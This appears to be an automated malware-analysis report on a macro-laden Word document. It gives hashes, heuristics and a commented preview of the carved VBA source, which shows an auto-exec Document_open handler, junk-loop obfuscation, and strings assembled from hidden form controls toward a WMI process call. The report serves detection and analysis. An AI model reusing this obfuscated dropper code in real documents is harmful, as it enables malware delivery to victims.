Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 07519f4d0537e18f…

MALICIOUS

Office (OLE)

183.4 KB Created: 2019-12-20 12:41:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 0198cd350b8be7a6eac9439badbf6ee6 SHA-1: 091e0de839c438ec0d65d035ffdc0d620d8e2e6f SHA-256: 07519f4d0537e18fc8ff259b5caaedf93617cc90aefc91a51b8cfd75c656126d
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Word document carrying VBA macros, including a Document_open auto-exec handler and a GetObject call (reported by the heuristics below; the call itself is not in the portion of the extracted source shown in the preview), so code runs as soon as the document is opened with macros enabled. The visible source is padded with dead Do While loops over never-assigned variables and lorem-ipsum string literals; the few live statements read values stashed outside the code — an MSForms TextBox on ThisDocument, fields and a .Tag property on the Gsoknbun form module — and Split() a delimiter-laden literal, so the operative strings are not present in the macro text and must be recovered from the form storage streams or the p-code. This combination of auto-exec, GetObject and string assembly from hidden sources is consistent with downloader/dropper behaviour, but the actual command or URL was not recovered. No specific family could be identified due to the obfuscation.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI found in virtually every Office document; it is not contacted at runtime and should not be treated as an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7499 bytes
SHA-256: eae12ec0adca4893d56cd720a52715dc074a24e946bcb5d4d9a1f20894a9ea29
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Jepjwaaqaamz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Xmyaygmvtv, 0, 0, MSForms, TextBox"
' Auto-exec entry point (heuristic OLE_VBA_DOCOPEN): Word runs this when the document is
' opened with macros enabled. The only live statement is the bare call to Kvbfglrzr at
' column 0; everything indented is padding. Each Do While tests a variable that is never
' assigned anywhere in the visible listing, so (absent Option Explicit) it is Empty and
' the comparison with 1 is False — the loop bodies, and the lorem-ipsum assignments
' inside them, never execute.
Private Sub Document_open()
   Ryohzngv = 234 + 423
   Do While Xhxckjxv = 1   ' never assigned -> Empty = 1 is False -> dead loop
      Hhdroptyujsb = 3 * Ivumncdtw
      Xhjrzfpq = ("Iste magni distinctio numquam illum quisquam quam minima.")
      For Kvwtjuibkjvf = Ppkhoqnlbrqi To Udclomxzx
         Hvslrfsr = ("Vero et aut unde.")
         Kvhcwhzt = 223
      Next
      Bkbghhkq = Qrqehuvzklyqv
Loop
' Live statement: calls Kvbfglrzr (defined later in this listing), which sets a delimiter
' string ("__&888*&^bBGks^@") and Split()s a literal padded with that delimiter; the rest
' of Kvbfglrzr — and therefore what is done with the assembled string — is truncated in
' this preview. NOTE(review): the GetObject call flagged by OLE_VBA_GETOBJ is not visible
' here; expect it in the truncated remainder.
Kvbfglrzr
   Jmgfwvnge = 234 + 423
   Do While Cmkdeuqcxtl = 1   ' never assigned -> dead loop, same pattern as above
      Yxoerrunufh = 3 * Jibgxlvoqsr
      Hogfnxdqhzhj = ("Qui et eveniet.")
      For Eahhciplhar = Nbhewxvjfgorj To Biuwixrniloxg
         Goryqoavk = ("Repellat nihil rerum ab.")
         Eyusptrpjygu = 223
      Next
      Vnysizpn = Azlblbnk
Loop
End Sub

Attribute VB_Name = "Gsoknbun"
Attribute VB_Base = "0{5FD7884A-141B-468D-BABB-0639DF734BE8}{B290731F-00E1-4FA7-85CC-84F998A45FA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Etceolpj"
' Assembles a string from values stored in form controls rather than in the macro source,
' so the operative content is not visible in this listing. Only the four column-0
' assignments do any work; every indented Do While block is dead padding (its loop
' variable is never assigned in the visible listing, so Empty = 1 is False and the body
' never runs). NOTE(review): Vlptvrwkyy is not called from Document_open in the visible
' source; whether Kvbfglrzr calls it is hidden by the truncation.
Function Vlptvrwkyy()
   Tfpksmuriti = 234 + 423
   Do While Jmekulsyblx = 1   ' dead loop
      Upcpehgsggohg = 3 * Witvxpbtih
      Mqrtrrvre = ("Ab error.")
      For Pbtvdgqcnahc = Bvitwthtztco To Plsggpeudtxmr
         Gfoybqvnyhvlv = ("In ut omnis error.")
         Tpuuncibvcogs = 223
      Next
      Jbdvsoopkfuxu = Eiteaisxru
Loop
' Reads Xmyaygmvtv, declared on the ThisDocument module (Jepjwaaqaamz) as an MSForms
' TextBox control (Attribute VB_Control above); its contents live in the form storage,
' not in this source.
Bgvsklceikepw = Jepjwaaqaamz.Xmyaygmvtv
   Uudhvnkk = 234 + 423
   Do While Wrxapcubzix = 1   ' dead loop
      Eyowknzpti = 3 * Plztjpdrwiuwb
      Hrdqeajzjgqa = ("Ipsa.")
      For Xciafzqviq = Bnvervttsyqr To Gmqmsohizflw
         Emjnxlzveepv = ("Dolorem excepturi.")
         Qzmrikse = 223
      Next
      Xeltoptvzcof = Tgvkilxw
Loop
' Appends three members of Gsoknbun (a form/designer module per its VB_Base GUIDs);
' presumably control values — recover them from the UserForm storage stream.
Twuajgnimx = Bgvsklceikepw + Gsoknbun.Tpctrwvl + Gsoknbun.Lewhkjaenyppe + Gsoknbun.Wadciacihu
   Ecusarquyncxp = 234 + 423
   Do While Kkxcplkcnt = 1   ' dead loop
      Rvhlzqym = 3 * Xohbktekmtoo
      Zufmuahyinzyr = ("Nisi eum tempora.")
      For Hrairmiv = Qychxpcu To Fllrbmzftb
         Chfbngjk = ("Deleniti doloribus dicta vel nesciunt voluptas.")
         Qldcerlxweiqx = 223
      Next
      Igencbmpp = Bvcwkyufuaoz
Loop
' Appends one more Gsoknbun member plus the .Tag property of control Ffftzxhkpw — .Tag
' is a free-form string property with no visual effect, so its value is invisible to the
' user and absent from the source.
Rwhsvasqayjvl = Twuajgnimx + Gsoknbun.Tfvsiusnj + Gsoknbun.Ffftzxhkpw.Tag
   Enipklatnxpcd = 234 + 423
   Do While Nttkimexlzou = 1   ' dead loop
      Xbsqezaaah = 3 * Rekaeprtecd
      Kaqxpwqjk = ("Meredith")
      For Wlzeumtmosvzn = Ycyduxfjtzkc To Fghnodsqny
         Rzopacmuxn = ("Gina")
         Vyrcffkjh = 223
      Next
      Molygchpz = Gfueyhqqmr
Loop
' Return value. Hhjaocxappmpa is never assigned in the visible listing, so it is Empty and
' the + operator returns the other operand unchanged: the function effectively returns
' Rwhsvasqayjvl, i.e. the concatenated control values.
Vlptvrwkyy = Hhjaocxappmpa + Rwhsvasqayjvl + Hhjaocxappmpa
   Zbxoxwajrrwj = 234 + 423
   Do While Kuemgzoapn = 1   ' dead loop
      Pgxvddgnhwc = 3 * Flesidafhl
      Gjcdzlkgigtlw = ("Natus iusto eum.")
      For Dufoskabnjhg = Jivgvwudk To Rnezsswukw
         Wzoghptr = ("Rerum.")
         Yyxxfary = 223
      Next
      Weaxvcuqlm = Ygzggpnnqq
Loop
End Function
Function Kvbfglrzr()
   Xdqrrexdtgv = 234 + 423
   Do While Ikqcpoklgoao = 1
      Jdynuecdb = 3 * Wwcypbefz
      Nsjbxcrpqc = ("Voluptatem blanditiis a totam enim voluptatem placeat impedit eveniet.")
      For Ozusbioejxwts = Qmwirizpge To Amlcduzoy
         Dxkubqvpjp = ("Quod consequatur.")
         Ctukooko = 223
      Next
      Bosxutztto = Tkgoyzko
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Ibaqraws = 234 + 423
   Do While Huaioubecliwm = 1
      Lfatsftsxj = 3 * Psidnzluiv
      Wskhesmocefvv = ("Provident repudiandae libero ut.")
      For Rncdzumlmtiu = Ddqtcwau To Fwfgkmmhogu
         Smdkgxovx = ("Recusandae.")
         Yapcsdtwboy = 223
      Next
      Fbahbgpgwxx = Ltxxshgrhkxkp
Loop
Rnyaxlwhc = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&8
... (truncated)